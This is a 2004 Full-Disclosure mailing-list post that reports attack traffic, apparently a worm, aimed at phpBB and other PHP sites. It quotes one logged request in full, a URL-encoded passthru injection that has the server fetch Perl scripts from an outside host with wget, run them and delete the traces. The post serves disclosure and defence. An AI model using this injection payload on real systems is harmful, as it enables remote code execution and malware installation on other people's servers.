Here are some samples of what this one does, and some statistics on 300,000 hits in 55 hours:
http://castlecops.com/article-5642-nested-0-0.html On Sat, 25 Dec 2004, Adam wrote: > The request for this one (even against a non phpBB scripts) appears to > look like this: > > "GET > /?p=comments&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20crowklan.mine.nu/~pillar/.zk/coll;perl%20coll;wget%20crowklan.mine.nu/~pillar/.zk/aol;perl%20aol;rm%20-rf%20aol.*;rm%20-rf%20coll*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 > > HTTP/1.1" -- Regards, Paul Laudanski - Computer Cops, LLC. CEO & Founder CastleCops(SM) - http://castlecops.com Promoting education and health in online security and privacy. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
